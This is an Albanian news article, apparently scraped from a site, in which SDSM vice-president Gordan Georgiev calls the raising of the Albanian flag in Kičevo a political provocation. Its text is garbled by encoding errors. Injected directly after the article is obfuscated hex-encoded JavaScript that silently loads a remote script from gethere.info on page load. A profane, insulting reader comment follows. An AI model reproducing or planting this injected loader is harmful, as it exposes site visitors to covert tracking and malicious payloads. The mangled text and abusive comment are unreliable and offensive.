largea_georgiev1353400012

Georgiev: ‘Flamuri shqiptar nA� KA�rA�ovA�, provokim politik’

Vendosjen e flamurit kombA�tar shqiptar nA� GreshnicA� tA� KA�rA�ovA�s, LSDM-ja opozitare e ka cilA�suar si skandal serioz dhe provokim politik.

NA�nkryetari i kA�tij subjekti politik Gordan Georgiev tha se nA� mA�nyrA� jo ligjore nA� KA�rA�ovA� A�shtA� vendosur flamuri shqiptar, ndA�rsa akuzoi kreune BDI-sA� Ahmeti, se ka dA�rguar provokime tA� drejtpA�rdrejta deri tek institucionet e sistemit dhe partneri i tij i koalicionit Gruevski se askush nuk mund ta ulA� atA� flamur.

Georgiev th ase nuk mundet qA� partnerA�t e koalicionit pA�r gjithA�ka tjetA�r tA� funksionojnA� nA� mA�nyrA� perfekte, ndA�rsa tA� m,os mund tA� merren vesh rreth A�A�shtjeve mA� tA� ndjeshme, tensioneve ndA�retnike.

“Duke u treguar secili nA� taborin e tij dhe bashkA�sinA� e tyre etnike, VMRO DPMNE-ja dhe BDI-ja nA� mA�nyrA� plotA�suese e polarizojnA� shoqA�rinA� maqedonase dhe luajnA� lojA� tA� rrezikshme nA� tA� cilA�n kostoja e saj A�shtA� stabiliteti i shtetit.

Duam tA� pyesim drejtpA�rdrejtA� z.Ahmetin dhe Gruevskin, a janA� tA� vetA�dijshA�m, cili A�shtA� rezultati i sjelljes suaj tA� pa pA�rgjegjshme dhe politikave tA� gabuara? Me hapa tA� kA�tillA�, ose do tA� shkaktoni tensione tA� reja ndA�retnike ose nA� tA�rA�si do ta suspendoni shtetin ligjor dhe sundimin e sA� drejtA�sa�?, tha Gordan Georgiev, nA�nkryetar i LSDM-sA�.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

  • nakanak xik-xik

    gorgiev ta qifsha nanen loke ne kthiz bre teveqel bre poqfar provokimi asht aj flamur oh tyje podeshka mata qije mamin edadin met zduk krejt meta pshurr temelin more gomno jedno georgiev seshum pot pengon aj flamur ozine shyptar ket teveqel evirne afer flamurit